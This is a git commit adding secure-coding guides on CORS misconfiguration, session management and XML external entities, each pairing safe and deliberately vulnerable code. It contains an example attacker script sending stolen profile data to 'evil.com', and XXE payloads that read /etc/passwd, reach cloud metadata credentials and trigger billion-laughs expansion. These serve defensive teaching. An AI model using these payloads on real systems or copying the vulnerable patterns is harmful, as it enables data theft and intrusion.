Add session management, CORS, XXE patterns

Complete the security patterns collection:

- session-management.md: fixation, hijacking, secure cookies, concurrent sessions
- cors.md: origin validation, reflected origin attacks, preflight caching
- xxe.md: external entities, DTD attacks, language-specific fixes

Now 19 patterns covering comprehensive web application security.
2026-05-10 23:20:36 -07:00
parent 5b9f30e663
commit 17c535bc61
4 changed files with 556 additions and 4 deletions
@@ -20,13 +20,14 @@ Based on OWASP Top 10:2025 and recent security research.
 | [audit-logging.md](audit-logging.md) | What to log, what not to log | A09 |
 | [error-handling.md](error-handling.md) | Fail closed, no sensitive info in errors | A10 |

-### Identity
+### Identity & Session

 | File | Topic | OWASP 2025 |
 |------|-------|------------|
 | [authentication.md](authentication.md) | Passwords, tokens, MFA, brute force protection | A07 |
 | [authorization.md](authorization.md) | Permission checks, IDOR prevention, privilege escalation | A01 |
 | [jwt-security.md](jwt-security.md) | Algorithm confusion, weak secrets, expiration | A07 |
+| [session-management.md](session-management.md) | Session fixation, hijacking, secure cookies | A07 |

 ### Attack Prevention

@@ -34,10 +35,12 @@ Based on OWASP Top 10:2025 and recent security research.
 |------|-------|------------|
 | [injection-prevention.md](injection-prevention.md) | SQL, command, template, path traversal | A05 |
 | [ssrf.md](ssrf.md) | Server-side request forgery, metadata endpoints | A10 |
+| [xxe.md](xxe.md) | XML external entities, DTD attacks | A05 |
 | [dos-prevention.md](dos-prevention.md) | Rate limiting, resource bounds, algorithmic complexity | — |
 | [prompt-injection.md](prompt-injection.md) | LLM security, data/instruction separation | — |
 | [deserialization.md](deserialization.md) | Untrusted data deserialization, pickle, yaml | A08 |
 | [race-conditions.md](race-conditions.md) | TOCTOU, atomic check-and-act, database locks | — |
+| [cors.md](cors.md) | Origin validation, credential handling | A01 |

 ### Infrastructure

@@ -50,13 +53,13 @@ Based on OWASP Top 10:2025 and recent security research.

 | # | Category | Pattern |
 |---|----------|---------|
-| A01 | Broken Access Control | authorization.md |
+| A01 | Broken Access Control | authorization.md, cors.md |
 | A02 | Security Misconfiguration | secure-defaults.md |
 | A03 | Software Supply Chain Failures | supply-chain.md |
 | A04 | Cryptographic Failures | cryptography.md |
-| A05 | Injection | injection-prevention.md |
+| A05 | Injection | injection-prevention.md, xxe.md |
 | A06 | Insecure Design | secure-defaults.md |
-| A07 | Authentication Failures | authentication.md, jwt-security.md |
+| A07 | Authentication Failures | authentication.md, jwt-security.md, session-management.md |
 | A08 | Software or Data Integrity Failures | deserialization.md |
 | A09 | Security Logging and Alerting Failures | audit-logging.md |
 | A10 | Mishandling of Exceptional Conditions | error-handling.md, ssrf.md |
@@ -0,0 +1,183 @@
+# CORS Misconfiguration
+
+## Rule
+
+Never reflect Origin blindly. Allowlist specific origins. Don't use credentials with wildcards.
+
+**Source:** [OWASP Cross-Site Request Forgery Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)
+
+## CORS Basics
+
+Browsers block scripts from reading cross-origin responses by default. CORS headers selectively allow it:
+
+| Header | Purpose |
+|--------|---------|
+| `Access-Control-Allow-Origin` | Which origins can access |
+| `Access-Control-Allow-Credentials` | Allow cookies/auth |
+| `Access-Control-Allow-Methods` | Allowed HTTP methods |
+| `Access-Control-Allow-Headers` | Allowed request headers |
+
+## Correct Pattern
+
+```python
+from flask import Flask, make_response, request
+
+app = Flask(__name__)
+
+ALLOWED_ORIGINS = {
+    "https://app.example.com",
+    "https://admin.example.com",
+}
+
+def add_cors_headers(response):
+    origin = request.headers.get("Origin")
+    
+    # Validate against allowlist
+    if origin in ALLOWED_ORIGINS:
+        response.headers["Access-Control-Allow-Origin"] = origin
+        response.headers["Access-Control-Allow-Credentials"] = "true"
+        response.headers["Access-Control-Allow-Methods"] = "GET, POST, PUT, DELETE"
+        response.headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization"
+        response.headers["Vary"] = "Origin"  # Important for caching!
+    
+    return response
+
+# For public APIs without credentials
+def add_public_cors(response):
+    response.headers["Access-Control-Allow-Origin"] = "*"
+    # Note: credentials CANNOT be used with wildcard
+    response.headers["Access-Control-Allow-Methods"] = "GET"
+    return response
+
+# Handle preflight requests
+@app.route("/api/<path:path>", methods=["OPTIONS"])
+def preflight(path):
+    response = make_response()
+    return add_cors_headers(response)
+```
+
+## Incorrect Pattern
+
+```python
+# Wrong: reflect any origin (allows any site to access)
+@app.after_request
+def bad_cors(response):
+    origin = request.headers.get("Origin")
+    response.headers["Access-Control-Allow-Origin"] = origin  # Reflected!
+    response.headers["Access-Control-Allow-Credentials"] = "true"
+    return response
+    # Attack: evil.com can now make authenticated requests
+
+# Wrong: wildcard with credentials
+response.headers["Access-Control-Allow-Origin"] = "*"
+response.headers["Access-Control-Allow-Credentials"] = "true"
+# Browser will reject, but shows misunderstanding
+
+# Wrong: suffix match without a dot boundary
+def check_origin(origin):
+    return origin.endswith("example.com")
+    # Bypassed by: https://attacker-example.com
+
+# Wrong: null origin allowed
+ALLOWED_ORIGINS = {"https://app.example.com", "null"}
+# "null" origin sent by sandboxed iframes, file:// URLs - attacker controlled!
+
+# Wrong: substring match
+def check_origin(origin):
+    return "example.com" in origin
+    # Bypassed by: example.com.evil.com
+```
+
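Naive origin checks of the kind shown above can be tested directly. The following is a minimal sketch using only the standard library; the function names (`suffix_check`, `substring_check`, `exact_check`) and the attacker origins are hypothetical illustrations, not part of any framework.

```python
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}

def suffix_check(origin: str) -> bool:
    # Naive: no dot boundary, so any host ending in "example.com" passes
    return origin.endswith("example.com")

def substring_check(origin: str) -> bool:
    # Naive: matches the string anywhere in the origin
    return "example.com" in origin

def exact_check(origin: str) -> bool:
    # Strict: the full scheme + host must be in the allowlist
    return origin in ALLOWED_ORIGINS

# Hypothetical attacker-controlled origins
ATTACKER_ORIGINS = [
    "https://attacker-example.com",
    "https://example.com.evil.com",
    "null",
]

for origin in ATTACKER_ORIGINS:
    print(origin, suffix_check(origin), substring_check(origin), exact_check(origin))
```

Only the exact allowlist lookup rejects all three origins; each naive check accepts at least one of them.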
+## Origin Validation
+
+```python
+from urllib.parse import urlparse
+
+ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}
+
+def is_valid_origin(origin: str) -> bool:
+    """Strict origin validation."""
+    if not origin:
+        return False
+    
+    # Never allow null
+    if origin == "null":
+        return False
+    
+    # Exact match against allowlist
+    if origin in ALLOWED_ORIGINS:
+        return True
+    
+    # If you need subdomain matching, be careful:
+    try:
+        parsed = urlparse(origin)
+        # Must be HTTPS
+        if parsed.scheme != "https":
+            return False
+        
+        # Exact domain match (not suffix!)
+        allowed_domains = {"app.example.com", "admin.example.com"}
+        if parsed.netloc in allowed_domains:
+            return True
+        
+        # Subdomain of specific parent (careful!)
+        if parsed.netloc.endswith(".trusted.example.com"):
+            # Verify it's actually a subdomain, not suffix attack
+            parts = parsed.netloc.split(".")
+            if len(parts) >= 4 and parts[-3:] == ["trusted", "example", "com"]:
+                return True
+    except Exception:
+        return False
+    
+    return False
+```
+
+## Attack Scenarios
+
+```python
+# Scenario 1: Data theft via reflected origin
+# 
+# Vulnerable server reflects any Origin with credentials
+# 
+# Attacker's evil.com:
+# <script>
+# fetch("https://api.victim.com/user/profile", {
+#     credentials: "include"
+# })
+# .then(r => r.json())
+# .then(data => {
+#     // Send stolen data to attacker
+#     fetch("https://evil.com/steal?data=" + JSON.stringify(data))
+# })
+# </script>
+
+# Scenario 2: CSRF via CORS
+#
+# If CORS allows credentials from evil.com,
+# evil.com can make authenticated state-changing requests
+```
+
+## Preflight Caching
+
+```python
+@app.after_request
+def cors_headers(response):
+    origin = request.headers.get("Origin")
+    if origin in ALLOWED_ORIGINS:
+        response.headers["Access-Control-Allow-Origin"] = origin
+        response.headers["Access-Control-Allow-Credentials"] = "true"
+        response.headers["Access-Control-Max-Age"] = "86400"  # Cache preflight up to 24h; browsers cap this (Chromium at 2h)
+        response.headers["Vary"] = "Origin"  # CRITICAL for caching
+    return response
+
+# Why Vary: Origin matters:
+# Without it, CDN might cache response for origin A
+# Then serve that cached response to origin B (wrong ACAO header!)
+```
+
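The header logic can also be kept framework-free so it is easy to unit test. This is a sketch under assumptions: `cors_headers_for` is a hypothetical helper, and unlike the handler above it sets `Vary: Origin` on every response, on the assumption that a shared cache should key on `Origin` even when the origin is rejected.

```python
from typing import Dict, Optional

ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}

def cors_headers_for(origin: Optional[str]) -> Dict[str, str]:
    """Return the CORS-related headers to attach for a request Origin."""
    # Vary is always present so caches never reuse a response across origins
    headers = {"Vary": "Origin"}
    if origin in ALLOWED_ORIGINS:
        headers["Access-Control-Allow-Origin"] = origin
        headers["Access-Control-Allow-Credentials"] = "true"
        headers["Access-Control-Max-Age"] = "86400"
    return headers

print(cors_headers_for("https://app.example.com"))
print(cors_headers_for("https://evil.com"))
```

A rejected origin receives no `Access-Control-*` headers at all, so the browser blocks the cross-origin read.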
+## Edge Cases
+
+- WebSocket handshakes are not subject to CORS; validate the `Origin` header manually on the server
+- `Access-Control-Expose-Headers` is needed before scripts can read custom response headers
+- Preflight is not sent for "simple" requests (GET, HEAD, or POST with only CORS-safelisted headers and content types)
+- Internal APIs should still validate Origin (defense in depth)
+- Browser extensions can bypass CORS (not a vulnerability)
+- Server-to-server requests don't involve CORS
@@ -0,0 +1,185 @@
+# Session Management
+
+## Rule
+
+Generate unpredictable session IDs. Bind sessions to users. Expire aggressively. Regenerate on privilege change.
+
+**Source:** [OWASP Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)
+
+## Session Attacks
+
+| Attack | Description | Defense |
+|--------|-------------|---------|
+| Session fixation | Attacker sets victim's session ID | Regenerate on login |
+| Session hijacking | Steal session via XSS/network | httpOnly, Secure flags |
+| Session prediction | Guess valid session IDs | Cryptographic randomness |
+| Session replay | Reuse captured session | Short expiration, binding |
+
+## Correct Pattern
+
+```python
+import secrets
+from datetime import datetime, timedelta
+from flask import session, request
+
+# Generate cryptographically secure session ID
+def generate_session_id() -> str:
+    return secrets.token_urlsafe(32)  # 256 bits of entropy
+
+# Session configuration
+SESSION_CONFIG = {
+    "cookie_name": "__Host-session",  # __Host- prefix enforces Secure + no Domain
+    "httponly": True,      # Not accessible to JavaScript
+    "secure": True,        # HTTPS only
+    "samesite": "Lax",     # CSRF protection
+    "max_age": 3600,       # 1 hour max
+}
+
+# Regenerate session on privilege change
+def login(user: User, password: str) -> bool:
+    if not verify_password(user, password):
+        return False
+    
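+    # CRITICAL: regenerate session ID to prevent fixation.
+    # regenerate() stands in for your session backend's rotation call;
+    # Flask's built-in cookie session has no such method.
+    session.regenerate()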
+    
+    session["user_id"] = user.id
+    session["login_time"] = datetime.utcnow().isoformat()
+    session["ip"] = request.remote_addr
+    session["user_agent"] = request.user_agent.string
+    
+    return True
+
+def logout():
+    # Invalidate server-side, not just client cookie
+    session_id = session.get("_id")
+    if session_id:
+        invalidate_session_server_side(session_id)
+    session.clear()
+
+# Validate session binding
+def validate_session() -> bool:
+    if "user_id" not in session:
+        return False
+    
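+    # Absolute timeout: 8 hours since login, however often the cookie is renewed
+    try:
+        login_time = datetime.fromisoformat(session["login_time"])
+    except (KeyError, ValueError):
+        logout()  # Missing or malformed timestamp: fail closed
+        return False
+    if datetime.utcnow() - login_time > timedelta(hours=8):
+        logout()
+        return False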
+    
+    # Optional: bind to IP (careful with mobile/proxies)
+    # if session.get("ip") != request.remote_addr:
+    #     logout()
+    #     return False
+    
+    return True
+```
+
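The cookie attributes in `SESSION_CONFIG` can be seen on the wire by building the header with the standard library. This is a minimal sketch; `build_session_cookie` is a hypothetical helper, and a real framework would normally emit this header for you.

```python
import secrets
from http.cookies import SimpleCookie

def build_session_cookie(session_id: str) -> str:
    """Return a Set-Cookie header value for the session cookie."""
    cookie = SimpleCookie()
    cookie["__Host-session"] = session_id
    morsel = cookie["__Host-session"]
    morsel["path"] = "/"          # Required by the __Host- prefix
    morsel["secure"] = True       # HTTPS only
    morsel["httponly"] = True     # Not readable from JavaScript
    morsel["samesite"] = "Lax"    # Limits cross-site sends
    morsel["max-age"] = 3600      # 1 hour
    return morsel.OutputString()

header_value = build_session_cookie(secrets.token_urlsafe(32))
print("Set-Cookie:", header_value)
```

No `Domain` attribute is set, which the `__Host-` prefix requires and which keeps the cookie bound to the exact host that issued it.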
+## Incorrect Pattern
+
+```python
+import random
+import hashlib
+
+# Wrong: predictable session ID
+def bad_session_id():
+    return str(random.randint(1000000, 9999999))
+
+# Wrong: sequential session ID
+COUNTER = 0
+def bad_session_id_2():
+    global COUNTER
+    COUNTER += 1
+    return str(COUNTER)
+
+# Wrong: user-derived session ID
+def bad_session_id_3(user_id):
+    return hashlib.md5(str(user_id).encode()).hexdigest()
+
+# Wrong: no regeneration on login (session fixation)
+def bad_login(user, password):
+    if verify_password(user, password):
+        session["user_id"] = user.id  # Same session ID!
+        return True
+    return False
+
+# Wrong: client-side only logout
+def bad_logout():
+    response = redirect("/")
+    response.delete_cookie("session")  # Clears the browser cookie only
+    return response
+    # Session still valid server-side!
+
+# Wrong: missing cookie security flags
+app.config["SESSION_COOKIE_HTTPONLY"] = False  # XSS can steal
+app.config["SESSION_COOKIE_SECURE"] = False    # Sent over HTTP
+```
+
+## Session Fixation Attack
+
+```python
+# Attack scenario:
+# 1. Attacker visits site, gets session ID "abc123"
+# 2. Attacker sends victim link: https://site.com/?sessionid=abc123
+# 3. Victim clicks, their browser now uses "abc123"
+# 4. Victim logs in (session ID unchanged!)
+# 5. Attacker uses "abc123" - now authenticated as victim
+
+# Defense: ALWAYS regenerate on login
+@app.route("/login", methods=["POST"])
+def login():
+    if authenticate(request.form):
+        session.regenerate()  # New session ID (placeholder for your session backend's rotation call)
+        session["authenticated"] = True
+    return redirect("/")
+```
+
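Because `session.regenerate()` depends on the session backend, the rotation step is easier to see with a toy server-side store. This is a sketch under assumptions: `SessionStore` is a hypothetical in-memory class, not a Flask API, and it carries pre-login data over to the new ID, which some applications may prefer to discard.

```python
import secrets
from typing import Dict, Optional

class SessionStore:
    """Toy server-side session store keyed by random session ID."""

    def __init__(self) -> None:
        self._sessions: Dict[str, dict] = {}

    def create(self) -> str:
        session_id = secrets.token_urlsafe(32)
        self._sessions[session_id] = {}
        return session_id

    def get(self, session_id: str) -> Optional[dict]:
        return self._sessions.get(session_id)

    def regenerate(self, old_id: str) -> str:
        """Move session data to a fresh ID and invalidate the old one."""
        data = self._sessions.pop(old_id, {})
        new_id = secrets.token_urlsafe(32)
        self._sessions[new_id] = data
        return new_id

    def invalidate(self, session_id: str) -> None:
        """Server-side logout: the ID stops working immediately."""
        self._sessions.pop(session_id, None)

store = SessionStore()
fixed_id = store.create()                # ID the attacker planted in the victim's browser
victim_id = store.regenerate(fixed_id)   # Rotation at login
store.get(victim_id)["user_id"] = 42
print(store.get(fixed_id))               # None
```

After rotation the attacker's copy of the ID resolves to nothing, so step 5 of the attack scenario fails.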
+## Concurrent Session Control
+
+```python
+# Limit active sessions per user
+MAX_SESSIONS_PER_USER = 3
+
+def create_session(user_id: str) -> str:
+    # Get existing sessions
+    existing = Session.query.filter_by(user_id=user_id).order_by(
+        Session.created_at.asc()
+    ).all()
+    
+    # Remove oldest if at limit
+    if len(existing) >= MAX_SESSIONS_PER_USER:
+        oldest = existing[0]
+        oldest.delete()
+        # Optionally notify user: "Logged out of oldest session"
+    
+    # Create new session
+    session_id = generate_session_id()
+    Session.create(
+        id=session_id,
+        user_id=user_id,
+        created_at=datetime.utcnow(),
+        ip=request.remote_addr
+    )
+    return session_id
+
+# Allow user to view/revoke sessions
+@app.route("/settings/sessions")
+def list_sessions():
+    sessions = Session.query.filter_by(user_id=current_user.id).all()
+    return render_template("sessions.html", sessions=sessions)
+
+@app.route("/settings/sessions/<session_id>/revoke", methods=["POST"])
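+def revoke_session(session_id):
+    # Named "target" so it does not shadow Flask's session object
+    target = Session.query.get(session_id)
+    # Only the owner may revoke a session
+    if target and target.user_id == current_user.id:
+        target.delete()
+    return redirect("/settings/sessions")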
+```
+
+## Edge Cases
+
+- Mobile apps: use short-lived access tokens, not sessions
+- "Remember me": separate long-lived token, not extended session
+- Password change should invalidate all other sessions
+- Admin impersonation needs audit trail
+- Idle timeout vs absolute timeout (both needed)
+- Session data size limits (don't store large objects)
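
The idle and absolute timeouts from the list above can be combined in one check. This is a minimal sketch; `is_expired` is a hypothetical helper, the 30-minute idle limit is an assumed value, and the 8-hour absolute limit mirrors the check in `validate_session`.

```python
from datetime import datetime, timedelta, timezone

IDLE_TIMEOUT = timedelta(minutes=30)    # Assumed value for illustration
ABSOLUTE_TIMEOUT = timedelta(hours=8)   # Same limit as validate_session

def is_expired(created_at: datetime, last_seen: datetime, now: datetime) -> bool:
    """True when either the idle or the absolute limit has passed."""
    idle_exceeded = now - last_seen > IDLE_TIMEOUT
    absolute_exceeded = now - created_at > ABSOLUTE_TIMEOUT
    return idle_exceeded or absolute_exceeded

now = datetime(2026, 1, 1, 12, 0, tzinfo=timezone.utc)
active = is_expired(now - timedelta(hours=1), now - timedelta(minutes=5), now)
idle = is_expired(now - timedelta(hours=1), now - timedelta(minutes=45), now)
too_old = is_expired(now - timedelta(hours=9), now - timedelta(minutes=1), now)
print(active, idle, too_old)
```

A continuously active session still ends at the absolute limit, which bounds how long a stolen session ID stays useful.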
@@ -0,0 +1,181 @@
+# XML External Entities (XXE)
+
+## Rule
+
+Disable external entity processing. Disable DTDs. Use safe parser defaults.
+
+**Source:** [OWASP XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
+
+## What XXE Can Do
+
+- **File disclosure**: Read `/etc/passwd`, config files, source code
+- **SSRF**: Make requests to internal services
+- **DoS**: Billion laughs attack (exponential entity expansion)
+- **Port scanning**: Error-based probing of internal ports
+- **RCE**: In some configurations (PHP expect://)
+
+## Attack Payloads
+
+```xml
+<!-- File disclosure -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "file:///etc/passwd">
+]>
+<data>&xxe;</data>
+
+<!-- SSRF to cloud metadata -->
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
+]>
+<data>&xxe;</data>
+
+<!-- Billion laughs DoS -->
+<?xml version="1.0"?>
+<!DOCTYPE lolz [
+  <!ENTITY lol "lol">
+  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
+  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+  <!-- ... continues exponentially -->
+]>
+<lolz>&lol9;</lolz>
+```
+
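The size of the billion laughs expansion follows from simple arithmetic. This sketch assumes the elided entities (`lol4` through `lol9`) follow the same pattern as `lol2` and `lol3`, each referencing its predecessor ten times; `expanded_size` is a hypothetical helper.

```python
def expanded_size(base_len: int, fanout: int, levels: int) -> int:
    """Bytes produced when an entity nested `levels` deep is fully expanded."""
    return base_len * fanout ** levels

# "lol" is 3 bytes; lol2 through lol9 are 8 nesting levels of 10 references each
size = expanded_size(base_len=3, fanout=10, levels=8)
print(f"{size:,} bytes")  # 300,000,000 bytes
```

Each extra nesting level multiplies the output by ten, so a short payload can exhaust a parser's memory.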
+## Correct Pattern
+
+```python
+# Python - defusedxml (recommended)
+import defusedxml.ElementTree as ET
+
+def parse_xml_safe(xml_string: str):
+    """Parse XML with XXE protection."""
+    return ET.fromstring(xml_string)
+
+# Python - standard library with safe settings
+import xml.etree.ElementTree as StdET  # Distinct alias so defusedxml's ET above is not shadowed
+
+def parse_xml_manual(xml_string: str):
+    """Manual safe configuration."""
+    parser = StdET.XMLParser()
+    # Python's ElementTree doesn't resolve external entities by default,
+    # but entity-expansion DoS (billion laughs) still applies with Expat older than 2.4.1.
+    # Always verify your specific library!
+    return StdET.fromstring(xml_string, parser=parser)
+
+# lxml with safe settings
+from lxml import etree
+
+def parse_xml_lxml(xml_string: str):
+    """lxml with XXE disabled."""
+    parser = etree.XMLParser(
+        resolve_entities=False,
+        no_network=True,
+        dtd_validation=False,
+        load_dtd=False,
+    )
+    return etree.fromstring(xml_string.encode(), parser=parser)
+```
+
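When `defusedxml` is not available, the "disable DTDs" rule can be approximated with the standard library by rejecting any document that declares a DOCTYPE. This is a sketch under assumptions: `parse_without_dtd` and `DoctypeForbidden` are hypothetical names, and the document is parsed twice, which may matter for large inputs.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat

class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""

def parse_without_dtd(xml_text: str) -> ET.Element:
    """Reject any document with a DOCTYPE, then parse it normally."""
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden("DOCTYPE declarations are not allowed")

    # First pass: Expat calls the handler as soon as it sees <!DOCTYPE
    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = on_doctype
    checker.Parse(xml_text, True)

    # Second pass: the document has no DTD, so no entities can be declared
    return ET.fromstring(xml_text)

root = parse_without_dtd("<data><item>ok</item></data>")
print(root.find("item").text)
```

Passing the file disclosure payload from the Attack Payloads section to `parse_without_dtd` raises `DoctypeForbidden` before the entity is ever referenced.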
+## Incorrect Pattern
+
+```python
+from lxml import etree
+
+# Wrong: relying on lxml defaults (older lxml releases resolve external entities by default)
+def bad_parse(xml_string: str):
+    return etree.fromstring(xml_string)
+
+# Wrong: explicitly enabling dangerous features
+def bad_parse_2(xml_string: str):
+    parser = etree.XMLParser(resolve_entities=True)
+    return etree.fromstring(xml_string, parser=parser)
+
+# Wrong: using xml.dom.minidom without protection
+from xml.dom.minidom import parseString
+def bad_parse_3(xml_string: str):
+    return parseString(xml_string)  # May be vulnerable
+
+# Wrong: SAX parser without disabling features
+import xml.sax
+def bad_parse_4(xml_string: str):
+    handler = xml.sax.ContentHandler()  # Default no-op handler
+    xml.sax.parseString(xml_string, handler)
+```
+
+## Language-Specific Fixes
+
+### Java
+
+```java
+// DocumentBuilderFactory
+DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
+dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
+dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+dbf.setXIncludeAware(false);
+dbf.setExpandEntityReferences(false);
+
+// SAXParserFactory
+SAXParserFactory spf = SAXParserFactory.newInstance();
+spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
+spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+```
+
+### .NET
+
+```csharp
+// XmlReader (safe by default in .NET 4.5.2+)
+XmlReaderSettings settings = new XmlReaderSettings();
+settings.DtdProcessing = DtdProcessing.Prohibit;
+settings.XmlResolver = null;
+XmlReader reader = XmlReader.Create(stream, settings);
+
+// XmlDocument
+XmlDocument doc = new XmlDocument();
+doc.XmlResolver = null;  // Disable external resources
+doc.LoadXml(xmlString);
+```
+
+### PHP
+
+```php
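+// Disable entity loading globally (deprecated since PHP 8.0, where libxml 2.9+
+// already disables external entity loading by default)
+libxml_disable_entity_loader(true);
+
+// Wrong: LIBXML_NOENT substitutes entities and LIBXML_DTDLOAD loads external DTDs
+// $doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_DTDATTR);
+
+// Right: omit those flags and block network access
+$doc = new DOMDocument();
+$doc->loadXML($xml, LIBXML_NONET);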
+```
+
+## When You Need DTDs
+
+```python
+# If you absolutely need DTD validation (rare):
+# 1. Allowlist specific DTDs
+# 2. Fetch DTDs from local filesystem only
+# 3. Never allow user-controlled DTD URLs
+
+from lxml import etree
+
+ALLOWED_DTDS = {
+    "-//W3C//DTD XHTML 1.0 Strict//EN": "/path/to/local/xhtml1-strict.dtd"
+}
+
+class SafeResolver(etree.Resolver):
+    def resolve(self, system_url, public_id, context):
+        if public_id in ALLOWED_DTDS:
+            return self.resolve_filename(ALLOWED_DTDS[public_id], context)
+        raise ValueError(f"DTD not allowed: {public_id}")
+```
+
+## Edge Cases
+
+- SVG files are XML — validate uploads!
+- SOAP/XML-RPC endpoints are XXE targets
+- Office documents (DOCX, XLSX) contain XML
+- Configuration files (Maven pom.xml, Spring beans.xml)
+- RSS/Atom feeds
+- SAML assertions
+- Blind XXE (out-of-band data exfiltration via DNS/HTTP)